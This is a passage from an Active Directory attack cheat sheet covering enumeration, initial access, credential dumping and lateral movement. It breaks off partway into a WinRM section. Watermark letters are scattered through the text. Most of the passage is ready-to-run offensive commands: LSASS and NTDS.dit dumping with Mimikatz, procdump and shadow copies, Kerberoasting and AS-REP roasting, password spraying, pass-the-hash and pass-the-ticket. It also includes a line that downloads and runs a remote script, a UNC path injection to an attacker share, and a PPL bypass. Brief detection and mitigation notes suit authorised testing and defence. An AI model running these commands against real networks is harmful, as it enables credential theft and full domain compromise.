●​ Examine msDS-AllowedToDelegateTo (constrained delegation).
●​ Note adminCount=1 (AdminSDHolder protection).
●​ PowerView & ADModule are excellent for this.
●​ BloodHound visualizes attack paths.
●​ CrackMapExec scales enumeration, especially with credentials.
Working with PowerShell Modules:
●​ Import-Module ActiveDirectory​
​
(RSAT needed or on DC/member)
●​ Import-Module .\PowerView.ps1​
​
(or IEX (New-Object Net.WebClient).DownloadString('http://host/PowerView.ps1'))
M

Your Toolkit & Commands:

ad

●​ PowerView (PowerSploit PowerShell module):

○​ Domain/Forest Info:​
e

Get-NetDomain​
By

Get-DomainSID​
(Get-DomainPolicy)."systemaccess"​
KA

(Get-DomainPolicy)."kerberospolicy"​
​
R

(Or Get-Domain)
IM

○​ Users:​
Get-NetUser​
AS

Get-DomainUser​
Get-NetUser -UserName <User>​
H

Get-DomainUser -Identity <User>​

R

Get-NetUser -Properties
AF

samaccountname,description,pwdlastset,lastlogontimestamp,badpwdcount,m
emberof,serviceprincipalname,useraccountcontrol,admincount,comment,mail​
Find-UserField -SearchField Description -SearchTerm "admin*"​
Get-UserProperty -Properties pwdlastset,lastlogon | Sort-Object pwdlastset​
Get-NetUser -PreauthNotRequired​
Get-DomainUser -PreauthNotRequired​
Get-NetUser -SPN​
Get-DomainUser -SPN​
Get-NetUser -TrustedToAuth​
Get-DomainUser -TrustedToAuth​
Get-NetUser -Unconstrained​
Get-DomainUser -AllowDelegation​
 Get-NetUser -PasswordNotRequired​
Get-NetUser -PasswordNeverExpires​
Get-NetUser -AdminCount​

○​ Groups:​
Get-NetGroup​
Get-DomainGroup​
Get-NetGroup -GroupName "Domain Admins"​
Get-DomainGroup -Identity "Domain Admins"​
Get-NetGroupMember -GroupName "Domain Admins" -Recurse​
Get-DomainGroupMember -Identity "Domain Admins" -Recursive​
Get-DomainGroup -Identity <GroupName> | Select-Object -ExpandProperty
M

Member​
ad

Get-NetLocalGroup -ComputerName <Target> -Recurse​

Get-NetGroup -AdminCount​
e

Find-ForeignUser​
By

Find-ForeignGroup​
KA

○​ Computers:​
Get-NetComputer​
R

Get-DomainComputer​
IM

Get-NetComputer -FullData​
Get-NetComputer -OperatingSystem "*Server*"​
AS

Get-NetComputer -Unconstrained​
Get-NetComputer -TrustedToAuth​
H

Get-NetComputer -Ping​
R

○​ GPOs:​
AF

Get-NetGPO​
Get-NetGPO -ComputerName <ComputerName>​
Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName​
Find-GPOLocation -UserName <UserName>​
Get-NetGPOGroup​
Get-NetGPO -GPOname <GUID_of_GPO>​

○​ OUs:​
Get-NetOU -FullData​
Get-NetOU -OUName "Servers"​
 ○​ ACLs:​
Get-ObjectAcl -SamAccountName <AccountName> -ResolveGUIDs​
Get-ObjectAcl -ADSprefix 'CN=Administrator,CN=Users' -Verbose​
Find-InterestingDomainAcl -ResolveGUIDs​
Invoke-ACLScanner -ResolveGUIDs​
Get-PathAcl -Path "\\<Server>\<Share>"​

○​ Trusts:​
Get-NetDomainTrust​
Get-NetForestDomain​
Get-NetForestTrust​
Get-DomainTrustMapping​
M
ad

○​ User Hunting / Session Snooping (Often needs local admin on targets):​

Find-DomainUserLocation -ShowAll​
e

Invoke-UserHunter​
By

Invoke-UserHunter -CheckAccess​
Invoke-UserHunter -Stealth​
KA

Find-LocalAdminAccess -Verbose​
Invoke-EnumerateLocalAdmin -Verbose​
R

Get-NetSession -ComputerName <Target>​

IM

Get-NetLoggedon -ComputerName <Target>​

Invoke-UserHunter -GroupName "Domain Admins" -Verbose​
AS

●​ ADModule (PowerShell's Official AD Cmdlets):

H

○​ Users:​
R

Get-ADUser -Filter * -Properties *​

Get-ADUser -Identity <User> -Properties *​
AF

Get-ADUser -Filter 'Description -like "*admin*"' -Properties

Description,MemberOf​
Get-ADUser -Filter {Enabled -eq $true -and PasswordNeverExpires -eq $true}
-Properties PasswordNeverExpires, SamAccountName​
Get-ADUser -Filter {(userAccountControl -band 4194304) -and (Enabled -eq
$true)} -Properties userAccountControl, SamAccountName​
Get-ADUser -Filter {(servicePrincipalName -ne "$null") -and (Enabled -eq
$true)} -Properties servicePrincipalName, SamAccountName​
Get-ADUser -Filter {(msDS-AllowedToDelegateTo -ne "$null") -or
(userAccountControl -band 524288) -or (userAccountControl -band
16777216)} -Properties SamAccountName, msDS-AllowedToDelegateTo,
 userAccountControl​

○​ Groups:​
Get-ADGroup -Filter *​
Get-ADGroupMember -Identity "Domain Admins" -Recursive​

○​ Computers:​
Get-ADComputer -Filter * -Properties *​
Get-ADComputer -Filter {OperatingSystem -like "*Server*"} -Properties
OperatingSystem,DNSHostName​
Get-ADComputer -Filter {userAccountControl -band 524288} -Properties
SamAccountName​
M
ad

○​ GPOs:​
Get-GPO -All​
e

Get-GPOReport -Name "<GPOName>" -ReportType Html -Path

By

C:\temp\gpo_report.html​
KA

○​ OUs:​
Get-ADOrganizationalUnit -Filter *​
R
IM

○​ Trusts:​
Get-ADTrust -Filter *​
AS

Get-ADTrust -Identity <DomainName>​

H

○​ Forest:​
R

Get-ADForest​
(Get-ADForest).Domains​
AF

○​ AppLocker Policy:​
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections​

●​ BloodHound (Visual Attack Path Analysis):

○​ Collectors:
■​ SharpHound (C#):
■​ SharpHound.exe -c All --NoSaveCache​
​
(Default)
■​ SharpHound.exe --CollectionMethods All --Domain <DomainFQDN>
 --Stealth​

■​ SharpHound.exe --CollectionMethods Session,LoggedOn -Loop

-Loopduration 00:30:00 -Loopinterval 00:05:00​

■​ SharpHound.exe -c All,GPOLocalGroup --LdapUsername <User>

--LdapPassword <Pass> ...​

■​ SharpHound.exe --CollectionMethod DCOnly​

​
(Stealthier)
■​ SharpHound.exe --computerfile <file_of_targets>​
M

​
ad

(Specific computer enumeration)

■​ Comprehensive:​
e

SharpHound.exe --CollectionMethods
By

All,GPOLocalGroup,CARegistry,DCRegistry,CertServices --Domain
<Domain> --Stealth --JSONFolder <Path> --EncryptZip
KA

--RandomizeFileNames --PrettyJson --Throttle 1000 --Jitter 25​

R

■​ Key Collection Methods: Group, LocalAdmin, Session, Trusts, ACL,

IM

Container, RDP, DCOM, PSRemote, GPOLocalGroup, LoggedOn,

ObjectProps, SPNTargets, UserRights, CARegistry, DCRegistry,
CertServices.
AS

■​ Invoke-BloodHound (PowerShell):​
Invoke-BloodHound -CollectionMethod All -Domain <DomainFQDN>
H

-LDAPUser <User> -LDAPPass <Password>​

R
AF

■​ BloodHound.py (Python):​
bloodhound-python -u <USER> -p <PASSWORD> -d <DOMAIN_FQDN> -ns
<DC_IP_or_Name> -gc <GC_IP> -c All --zip​

■​ Certipy for AD CS data:​

certipy find 'domain/user:pass@dc' -bloodhound​

○​ Analysis: Import JSON/ZIP to BloodHound GUI. Neo4j setup: sudo neo4j

console or Docker. Access GUI at http://localhost:7474.
○​ Custom Queries: hausec/Bloodhound-Custom-Queries,
CompassSecurity/BloodHoundQueries, ly4k/Certipy BloodHound Custom
 Queries.
●​ CrackMapExec (CME):
○​ SMB:​
cme smb <Targets> -u <user> -p <pass> --users, --groups, --loggedon-users,
--sessions, --local-groups, --pass-pol, --rid-brute [MAX_RID], --laps​
cme smb <Targets> --local-auth --users​

○​ LDAP:​
cme ldap <DC_IP> -u <user> -p <pass> --users, --groups, --computers,
--admin-count, --trusted-for-delegation, --password-not-required,
--asreproast <file>, --kerberoasting <file>​
M

●​ ADRecon:​
ad

ADRecon.ps1​
ADRecon.ps1 -DomainController <DC_IP_or_FQDN> -Credential <DOMAIN\User>​
e

ADRecon.ps1 -GenExcel <report_folder>​

By

●​ Sysinternals ADExplorer: GUI tool for browsing AD database, taking snapshots.

KA

●​ PingCastle: Auditing AD security level.​

PingCastle.exe --healthcheck --server <DC_IP>​
R
IM

●​ Group3r: Auditing GPO misconfigurations.​

group3r.exe -d <domain> -s​
AS

●​ Snaffler: Finding sensitive files on shares.​

H

Snaffler.exe -s -d <domain> -o snaffler.log -v data​

R

●​ LAPS Toolkit: Find-LAPSDelegatedGroups, Find-AdmPwdExtendedRights,

AF

Get-LAPSComputers (if LAPS is deployed). Get-AdmPwdPassword

-ComputerName <CompName>.
●​ Living Off The Land (LOLBAS) for Enumeration (Windows Native):
○​ net user /domain​
net group /domain​
net localgroup administrators /domain​

○​ dsquery user -name <user*>​

​
(requires RSAT or on DC)
○​ wmic useraccount get name,sid​
 wmic group get name,sid​
wmic ntdomain list /format:list​

○​ nltest /domain_trusts​
nltest /dclist:<domain>​

○​ gpresult /r​
​
(Applied GPOs for current user/computer)
○​ whoami /priv​
​
(Check current user privileges)
M

○​ qwinsta /server:<target>​
ad

​
(Check RDP sessions)
e

1.4 Initial User Hunting & Access Validation (Internal Recon - Often
By

Unauthenticated or Low-Priv)
●​ PowerView: Find-DomainUserLocation, Invoke-UserHunter -CheckAccess,
KA

Invoke-EnumerateLocalAdmin -Verbose
●​ Kerbrute:​
R

kerbrute userenum -d <DOMAIN> --dc <DC_IP> <userlist.txt> -o valid_users.txt​

IM

​
(Uses Kerberos Pre-Auth failures to validate users, stealthier than SMB
AS

enumeration).
○​ Compile from source:​
H

git clone https://github.com/ropnop/kerbrute.git; cd kerbrute; make all​

R
AF

●​ CrackMapExec (CME):​
cme smb <DC_IP> --users​
​
(If null session allowed).
●​ rpcclient:​
rpcclient -U "" -N <DC_IP>​
​
then enumdomusers.
●​ windapsearch.py:​
windapsearch.py --dc-ip <DC_IP> -U​
​
(Anonymous LDAP users).
●​ Passive Network Analysis: Wireshark/tcpdump for ARP, MDNS, NBT-NS to
identify hosts.​
sudo tcpdump -i <interface> -w capture.pcap​

●​ Responder in Analyze mode:​

sudo responder -I <interface> -A​
​
(Analyze mode for NetBIOS-NS/LLMNR broadcasts).
M
ad
e
By
KA
R
IM
AS
H
R
AF
Phase 2: Initial Access - Getting a Foothold 🔑
Your Goal Here: Gain an initial entry point into the network or onto a system within the AD
environment.
Pro Tip: This often involves exploiting vulnerabilities in public-facing applications, tricking
users via phishing, leveraging password reuse/spraying against externally accessible services,
or exploiting external misconfigurations. C2 frameworks like Covenant or Sliver are crucial for
payload generation, delivery, and post-access operations.
Your Toolkit & Commands/Techniques:
●​ Exploiting Public-Facing Applications:
○​ Web Vulnerabilities (SQLi, RCE, LFI/RFI, XXE, Deserialization, SSRF, etc.):
■​ Tools: sqlmap, Burp Suite, OWASP ZAP, Metasploit, custom exploit scripts.
M

■​ Example (sqlmap):​
sqlmap -u "http://target.com/vuln.php?id=1" --dbs --batch --os-shell
ad

--risk=3 --level=5​
e

○​ VPN Vulnerabilities: Search Exploit-DB, GitHub, Metasploit for CVEs (e.g.,

By

Pulse Secure, Fortinet, Citrix).

○​ Mail Server Exploits (Exchange: ProxyLogon, ProxyShell, ProxyNotShell,
KA

OWASSRF, CVE-2020-0688): PoCs, Metasploit.

○​ Other Exposed Services (RDP, SSH, Jenkins, Tomcat, JBoss, SharePoint,
R

Struts): Default creds, brute-force (hydra, medusa, CME), known exploits.

IM

●​ Phishing & Spear Phishing:

○​ Malicious Attachments: Office macros (VBA Stomping), ISO/LNK/HTA/CHM,
AS

weaponized PDFs.
■​ Tools: Unicorn, Macro_Pack, EvilOffice, Luckystrike.
H

○​ Credential Harvesting: Fake login pages (O365, VPN).

R

■​ Tools: Gophish, Social-Engineer Toolkit (SET), Evilginx2 (MitM for 2FA),

AF

CredSniper.
○​ Link-Based Attacks: Drive-by downloads (BeEF).
○​ DDE Attacks: Office DDE to execute commands.
○​ Further Reading: "The Hitchhiker's Guide To Initial Access", "Phishing with
Empire".
●​ Password Spraying:
○​ Goal: Try few common passwords (e.g., "Spring2024!", "Password123")
against many usernames.
○​ Pro Tip: Mind lockout policies (Get-DomainPolicy, enum4linux-ng -P). Spray
slowly. Target SMB, LDAP, OWA, EWS, WinRM, Azure AD, RDP.
○​ Tools:
 ■​ CrackMapExec (CME):​
cme <protocol> <Target_Range_or_DC_IP> -u <UserListFile.txt> -p
'<PasswordToTry>' --continue-on-success --log spray.log​

■​ MSOLSpray (Azure/O365):​
MSOLSpray.py -u <UserListFile.txt> -p '<PasswordToTry>' --throttle 5
--lockout 3​

■​ Spray (Go tool):​

spray -u <UserListFile.txt> -p '<PasswordToTry>' -t <Target_IP_or_Domain>
-threads 5 -delay 60s​
M

■​ Ruler (Exchange)
ad

■​ DomainPasswordSpray.ps1:​
Invoke-DomainPasswordSpray -UserList <UserListFile.txt> -Password
e

<PasswordToTry> -Domain <DomainName>​

By

■​ Kerbrute:​
KA

kerbrute passwordspray -d <domain> --dc <DC_IP> <userlist_file>

<password_to_try>​
R
IM

○​ Custom Scripts: Using PowerShell Invoke-RestMethod or Python requests for

web-based login forms.
AS

●​ URL File Attacks (NTLM Hash Capture with Responder): .url file with
IconFile=\\<AttackersResponderIP>\%USERNAME%.icon.
H

●​ LLMNR/NBT-NS/mDNS Poisoning (Responder/Inveigh):

R

○​ Responder (Linux):​
sudo responder -I <interface> -wrfvb​
AF

(Poisoning mode) or -A (Analyze mode). Hashes logged to

/usr/share/responder/logs/.
○​ Inveigh (Windows PowerShell/C#):​
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y​
​
(PowerShell). Inveigh.exe (C# version, interactive console with GET
NTLMV2UNIQUE).
○​ Mitigation: Disable LLMNR/NBT-NS via GPO/local settings. Enable SMB
Signing. Network segmentation.
○​ Detection: Monitor UDP 5355, 137. Event ID 4697, 7045. Registry changes for
EnableMulticast.
●​ Exploiting External Misconfigurations: Open SMB, RDP/WinRM with weak
creds, default creds on devices, leaked creds (GitHub, Pastebin), DNS misconfigs.
Check for misconfigured cloud services (S3 buckets, Azure Blobs) connected to
AD, or OAuth misconfigurations.
●​ Supply Chain Attacks: Compromising a less secure third-party vendor or
software update mechanism. (Highly sophisticated, typically out of scope for
standard pentests unless specified).
●​ C2 Frameworks for Payload Generation & Delivery:
○​ Covenant C2: .NET C2. Setup: dotnet run. Create Listeners, Launchers
(PowerShell, Binary, ShellCode, MSBuild, etc.).
○​ Sliver C2: Go-based. generate beacon ..., generate stager ....
M
ad
e
By
KA
R
IM
AS
H
R
AF
Phase 3: Credential Access & Dumping - Harvesting Secrets 🍯
Your Goal Here: Obtain valid credentials (plaintext passwords, NTLM hashes, Kerberos tickets
and keys) to expand access and move laterally.
Pro Tip: LSASS memory is a prime target. Kerberos tickets are gold. Always try to operate in
memory if possible to avoid disk-based detection. Shadow copies can be used to access
locked files like NTDS.dit or SAM hives. Be aware of LSA Protection (PPL) and Credential
Guard, which make LSASS dumping harder.
Your Toolkit & Commands:
●​ Dumping LSASS Memory (lsass.exe):
○​ Mimikatz (admin/SYSTEM):
■​ privilege::debug​
M

token::elevate​
sekurlsa::logonpasswords​
ad

sekurlsa::ekeys​
e

sekurlsa::tickets /export​
sekurlsa::tspkg​
By

sekurlsa::dpapi​
sekurlsa::minidump lsass.dmp​
KA

○​ ❗ LSA Protection (PPL) Bypass:

R

■​ Kernel (Driver): mimidrv.sys (!+, !processprotect /process:lsass.exe

IM

/remove, dump, !-)

■​ Userland (Malicious SSP): misc::memssp (Logs to kiwissp.log or
AS

mimilsa.log. Noisy, needs reboot/new logons).

❗
■​ Userland (PPLDump tool)
H

○​ Credential Guard: If enabled, lsaiso.exe virtualizes LSASS. Mimikatz

R

usually can't get plaintext/TGTs from lsass.exe.

AF

○​ ProcDump (Sysinternals):
■​ On target (Admin/SYSTEM):​
procdump.exe -accepteula -ma lsass.exe lsass.dmp​
​
(-ma: full dump)
■​ Offline (with Mimikatz):​
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords"
exit​

○​ Windows Task Manager: GUI, less stealthy, right-click lsass.exe -> "Create
dump file".
 ○​ Metasploit (Meterpreter with SYSTEM): load kiwi, creds_all, kerberos, msv.
Modules: post/windows/gather/smart_hashdump,
post/windows/gather/credentials/mimikatz, post/windows/gather/lsa_secrets.
○​ SharpDump (.NET): Assembly for LSASS dump.
○​ gsecdump: Older tool, likely detected.
○​ CrackMapExec Modules: lsassy, procdump, handlekatz, nanodump.
■​ cme smb <target> -u <user> -p <pass> -M lsassy​

■​ cme smb <target> -u <user> -p <pass> -M procdump​

■​ cme smb <target> -u <user> -p <pass> -M nanodump --dump-format

pypykatz​
M

​
ad

(Specify format for pypykatz parsing)

●​ Extracting Hashes from SAM/SYSTEM (Local Accounts):
e

○​ Live (admin/SYSTEM):​
By

reg save HKLM\SYSTEM system.hive​

reg save HKLM\SAM sam.hive​
KA

reg save HKLM\SECURITY security.hive​

​
R

(optional, for LSA secrets). Copy hives offline.

IM

○​ Offline (Impacket secretsdump.py):​

secretsdump.py -sam sam.hive -system system.hive -security security.hive
LOCAL​
AS

○​ Mimikatz (offline):​
H

lsadump::sam /sam:sam.hive /system:system.hive​

R
AF

○​ Mimikatz (live):​
token::elevate​
lsadump::sam​
lsadump::secrets​

○​ Metasploit (Meterpreter): hashdump, run post/windows/gather/hashdump

○​ CrackMapExec:​
cme smb <target> -u <user> -p <pass> --sam, --lsa​

●​ Dumping NTDS.dit (Domain Controller - All Domain Hashes & Keys):

○​ VSS (Volume Shadow Copy) - Preferred on live DC (DA or
 SeBackupPrivilege):
■​ ntdsutil.exe:​
ntdsutil "ac i ntds" "ifm" "create full C:\ntds_backup" q q​
​
Copy C:\ntds_backup\Active Directory\ntds.dit and
C:\ntds_backup\registry\SYSTEM.
■​ vssadmin.exe:​
vssadmin create shadow /for=C:​
​
Copy files from shadow path (e.g.,
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\Windows\NTDS\n
tds.dit and ...\System32\config\SYSTEM). Cleanup:​
M

vssadmin delete shadows /all​

ad

■​ diskshadow.exe script:​
e

set context persistent nowriters​

By

set metadata c:\windows\temp\backup.cab​

set verbose on​
KA

begin backup​
add volume C: alias ntds_backup_drive​
R

create​
IM

expose %ntds_backup_drive% X:​

# Manually copy X:\Windows\NTDS\ntds.dit and
X:\Windows\System32\config\SYSTEM​
AS

unexpose X:​
delete shadows exposed X:​
H

end backup​
R

reset​
AF

○​ Offline (Impacket secretsdump.py):​

secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -outputfile
ntds_extracts.txt​

○​ Metasploit (Meterpreter on DC):

post/windows/gather/credentials/domain_hashdump
○​ Invoke-NinjaCopy (PowerSploit): Copies locked files (needs
SeBackupPrivilege).
○​ CrackMapExec:​
cme smb <DC_IP> -u <DA_user> -p <DA_pass> --ntds [vss|drsuapi]​
 ​
(drsuapi is DCSync)
●​ Kerberoasting (Service Accounts with SPNs):
○​ Goal: Request TGS for service accounts (RC4 encrypted with service
account's NTLM hash). Crack offline. Any domain user.
○​ PowerView:
■​ Get-NetUser -SPN | Select-Object
samaccountname,serviceprincipalname,description​

■​ Request-SPNTicket -SPN <SPN_from_above> -Format Hashcat | Out-File

-Encoding ASCII kerberoast_hashes.txt​
M

■​ Invoke-Kerberoast -OutputFormat Hashcat​

ad

○​ ADModule:​
e

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties

By

ServicePrincipalName​
KA

○​ Impacket GetUserSPNs.py:​
GetUserSPNs.py -request -dc-ip <DC_IP>
R

<DOMAIN>/<User_with_read_access_or_DA>:<Password> -outputfile
IM

kerb_hashes.txt​
AS

■​ With hash: -hashes <LM:NT>

○​ Rubeus:​
H

Rubeus.exe kerberoast /outfile:kerb_hashes.txt /format:hashcat​

Rubeus.exe kerberoast /rc4opsec /aes /user:<svc_acc> /creduser:<user>
R

/credpassword:<pass>​
AF

○​ CrackMapExec:​
cme ldap <DC_IP> -u <USER> -p <PASSWORD> --kerberoasting
kerb_hashes.txt --kdcHost <KDC_IP>​

○​ Cracking:​
hashcat -m 13100 kerb_hashes.txt <WordlistFile>​
​
(RC4-HMAC)
○​ Detection: Event ID 4769 (TGS request) with RC4, high volume.
○​ Mitigation: Strong passwords for service accounts (25+ chars), gMSA, prefer
 AES for Kerberos (msDS-SupportedEncryptionTypes), monitor TGS requests.
●​ AS-REP Roasting (Users with Pre-auth Disabled):
○​ Goal: Request AS-REP (encrypted with user's NTLM hash) for users with "Do
not require Kerberos preauthentication". Crack offline. No domain creds
needed for enum if anonymous LDAP.
○​ PowerView:​
Get-DomainUser -PreauthNotRequired -Verbose | Select-Object
samaccountname​

○​ ADModule:​
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True -and Enabled -eq
$True} ...​
M
ad

○​ Force Disable Pre-auth (if write perms):​

Set-DomainObject -Identity <User> -XOR @{useraccountcontrol=4194304}
e

-Verbose​
By

○​ Impacket GetNPUsers.py:​
KA

GetNPUsers.py <DOMAIN>/ -usersfile <UserListFile.txt> -format hashcat

-outputfile asrep_hashes.txt -dc-ip <DC_IP>​
R
IM

○​ Rubeus:​
Rubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt
AS

/domain:<DOMAIN> /dc:<DC_IP>​
Rubeus.exe asreproast /user:<username> /ou:<OUName>​
H
R

○​ CrackMapExec:​
cme ldap <DC_IP> -u <UserListFile.txt> -p '' --asreproast asrep_hashes.txt​
AF

​
(if no creds needed for enum)
○​ Cracking:​
hashcat -m 18200 asrep_hashes.txt <WordlistFile>​
​
(Kerberos 5 AS-REP etype 23)
○​ Detection: Event ID 4768 (TGT request) error 0x19, or successful TGTs for
these accounts. Event ID 4738 (user account changed).
○​ Mitigation: Disable "Do not require Kerberos preauthentication". Strong
passwords. Monitor attribute changes.
●​ Searching for Passwords in Files/Registry/GPOs/Config Artifacts:
 ○​ SYSVOL (GPP Passwords): PowerView Get-GPPPassword, CME cme smb
<DC_IP> ... --gpp-passwords. Manual: Look in
\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\ for Groups.xml, Services.xml,
ScheduledTasks.xml. Decrypt cPassword attribute using gpp-decrypt or
online tools.
○​ Config Files: web.config, application.ini, unattend.xml, php.ini, .env.
○​ Scripts: PowerShell, batch, VBS, Python.
○​ User Docs: passwords.txt, creds.xlsx.
○​ Registry: VNC, RDP managers, FTP clients.
○​ Tools: grep, findstr, Invoke-ShareFinder, SharpShares, Invoke-FileFinder,
Snaffler.
○​ CrackMapExec Modules: gpp_password, gpp_autologin.
M

■​ cme smb <DC_IP> -u <user> -p <pass> -M gpp_password​

ad

■​ cme smb <DC_IP> -u <user> -p <pass> -M gpp_autologin​

e
By

●​ Dumping Browser Credentials: LaZagne, SharpChromium, Mimikatz

(dpapi::chrome, dpapi::firefox).
KA

●​ Dumping DPAPI Protected Secrets (Windows Data Protection API):

○​ Mimikatz:
R

■​ Get masterkey:​
IM

dpapi::masterkey /in:"<Path_to_MasterKeyFile>" /system​

​
AS

(if SYSTEM context) or /rpc (if remote) or by providing user's

password/hash.
H

■​ <Path_to_MasterKeyFile>: Typically
C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<User_SID>\...
R

■​ Decrypt credential:​
AF

dpapi::cred /in:"<Path_to_CredentialFile>"
/masterkey:<Derived_MasterKey_from_above>​

○​ SharpDPAPI:
■​ SharpDPAPI.exe masterkeys
/target:"C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<User_SID>
"​
SharpDPAPI.exe creds /target:"<Path_to_Cred_File_or_Directory>"
/server:<DC_IP>​
●​ LSA Secrets / Policy Secrets (often contains service account passwords):
○​ Mimikatz (SYSTEM): token::elevate, lsadump::secrets.
○​ secretsdump.py (offline against SYSTEM and SECURITY hives).
●​ MSSQL Credential Harvesting: UNC Path Injection: EXEC master..xp_dirtree
'\\attacker_smb\share'. PowerUpSQL: Get-MSSQLLinkPasswords,
Get-MSSQLCredential.
●​ Exchange Credential Harvesting: Embed SMB links in emails/calendar invites.
M
ad
e
By
KA
R
IM
AS
H
R
AF
Phase 4: Lateral Movement - Spreading Through the Network
🚶‍♂️➡️🚶‍♀️
Your Goal Here: Use compromised credentials (plaintext, hash, ticket) or exploits to gain
access to other systems within the network, moving closer to high-value targets.
Pro Tip: Choose technique based on the credentials you have and the services available on
the target. Prioritize stealth and "living off the land" where possible. NTLM Relay is powerful if
SMB signing is disabled or not required on target services. C2 frameworks like Sliver can
manage pivots and deploy agents. Be aware of UAC remote restrictions (RID 500 vs. other
local admins).
Your Toolkit & Commands (assuming you have credentials/tickets):
●​ Pass-the-Hash (PtH) with NTLM Hashes:
M

○​ CrackMapExec (SMB):​
ad

cme smb <Target_IP_or_Range> -u <USER> -H

<NTHASH_or_LMHASH:NTHASH> -x "whoami"​
e

cme smb <Target_IP_or_Range> -u <USER> -H <NTHASH> --put-file

By

<LocalFile> <RemotePath>​

○​ Impacket (Linux):​
KA

pth-winexe -U <DOMAIN>/<USER>%<NTHASH> //<TARGET_IP> cmd.exe​

# pth-smbclient ..., pth-rpcclient ...​
R

smbexec.py <DOMAIN>/<USER>@<TARGET_IP> -hashes

IM

<LMHASH>:<NTHASH>​
wmiexec.py <DOMAIN>/<USER>@<TARGET_IP> -hashes
AS

<LMHASH>:<NTHASH>​
H

○​ Metasploit exploit/windows/smb/psexec module:​

R

set RHOSTS <Target_IP>​

AF

set SMBUser <USER>​

set SMBPass <NTHASH_or_LMHASH:NTHASH>​
set PAYLOAD <payload>​
exploit​

○​ Invoke-SMBExec / Invoke-WMIExec (PowerSploit - PowerShell):​

Invoke-SMBExec -Target <Target_IP> -Domain <DOMAIN> -Username <USER>
-Hash <NTHASH> -Command "whoami"​
Invoke-WMIExec -Target <Target_IP> -Domain <DOMAIN> -Username <USER>
-Hash <NTHASH> -Command "whoami"​
 ○​ Mimikatz (for OverPass-the-Hash - creates new process with tickets
from hash):​
privilege::debug​
sekurlsa::pth /user:<USER> /domain:<DOMAIN_FQDN> /ntlm:<NTHASH>
/run:"cmd.exe"​

●​ Pass-the-Ticket (PtT) with Kerberos Tickets (.kirbi files):

○​ Mimikatz (Windows):​
kerberos::ptt <Path_To_Ticket.kirbi>​
​
(Injects ticket into current session)
○​ Rubeus (Windows):​
M

Rubeus.exe ptt /ticket:<Path_To_Ticket.kirbi_or_Base64String>

ad

[/luid:<LogonID>]​
e

○​ Impacket (Linux): Set env var: export KRB5CCNAME=/path/to/ticket.ccache.

By

Then use Impacket tools with -k -no-pass.

○​ PsExec (after PTT on Windows):​
KA

PsExec.exe -k \\<Target_IP> cmd.exe​

​
R

(-k uses Kerberos)

IM

●​ OverPass-the-Hash (OPtH) / Pass-the-Key (NTLM Hash or AES Key to get

Kerberos Tickets):
○​ Mimikatz (Windows):​
AS

sekurlsa::pth /user:<USER> /domain:<DOMAIN_FQDN> /ntlm:<NTHASH>​

sekurlsa::pth /user:<USER> /domain:<DOMAIN_FQDN> /aes256:<AES256_KEY>​
H
R

○​ Rubeus (Windows):​
AF

Rubeus.exe asktgt /user:<USER> /domain:<DOMAIN_FQDN> /ntlm:<NTHASH>

/ptt​
Rubeus.exe asktgt /user:<USER> /domain:<DOMAIN_FQDN>
/aes256:<AES256_KEY> /ptt​

■​ Option: /outfile:ticket.kirbi instead of /ptt.

●​ Remote Desktop Protocol (RDP) - Port 3389:
○​ Plaintext:
■​ Linux:​
xfreerdp /v:<Target_IP> /u:<DOMAIN\USER> /p:<PASSWORD>
/dynamic-resolution​
 ■​ Windows:​
mstsc.exe /v:<Target_IP>​
​
(prompts for creds)
○​ Restricted Admin Mode (/restrictedadmin):
■​ Condition: Enabled on target. Allows RDP using network logon
(hash/ticket).
■​ Windows (after PtH/PtT):​
mstsc.exe /v:<Target_IP> /restrictedadmin​

■​ Check if enabled:​
M

reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v

ad

DisableRestrictedAdmin​
​
e

(0 = enabled, 1 or not exist = disabled).

By

■​ Enable (needs admin on target):​

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v
KA

DisableRestrictedAdmin /d 0 /t REG_DWORD /f​

R

○​ Pass-the-Hash/Ticket with RDP:

IM

■​ Linux:​
proxychains4 -q xfreerdp /u:user /pth:HASH /d:domain /v:target​
AS

■​ Windows (after Rubeus asktgt and ptt): mstsc /restrictedAdmin

○​ SharpRDP: .NET tool for non-GUI RDP command execution.​
H

SharpRDP.exe computername=<target> command="payload"

R

username=<user> password=<pass>​
AF

○​ Clean RunMRU:​
CleanRunMRU.exe clearall​
​
(Clears RDP connection history)
○​ Pro Tip: Check for existing RDP sessions using qwinsta /server:<Target_IP>. If
you have admin rights on the target, you might be able to hijack sessions (e.g.,
using tscon).
●​ Windows Remote Management (WinRM / PowerShell Remoting) - Ports 5985
(HTTP), 5986 (HTTPS):
○​ Plaintext (PowerShell):​
 $cred = Get-Credential # prompts for DOMAIN\USER and PASSWORD​
Invoke-Command -ComputerName <Target_IP> -ScriptBlock {whoami}
-Credential $cred​
Enter-PSSession -ComputerName <Target_IP> -Credential $cred​

○​ Enable PS Remoting (Needs Admin):​

Enable-PSRemoting -Force​

○​ Evil-WinRM (Ruby - NTLM Hashes):​

evil-winrm -i <Target_IP> -u <USER> -H <NTHASH>​
evil-winrm -i <Target_IP> -u <USER> -p <PASSWORD>​
M

○​ CrackMapExec (WinRM):​
ad

cme winrm <Target_IP_or_Range> -u <USER> -p <PASSWORD_or_H

<NTHASH>> -x "whoami"​
e
By

○​ Metasploit: exploit/windows/winrm/winrm_script_exec,
auxiliary/scanner/winrm/winrm_login
KA

○​ winrs.exe (Windows native):​

winrs -r:<target> "command"​
R

winrs -r:<target> /u:<user> /p:<pass> "command"​

IM

○​ Copy files over WinRM: New-PSSession, then Copy-Item -ToSession

AS

$session ... or -FromSession $session ...

○​ Kerberos Double Hop Problem: WinRM by default doesn't delegate
H

credentials. Workarounds:
R

■​ Pass credentials explicitly for each hop:​

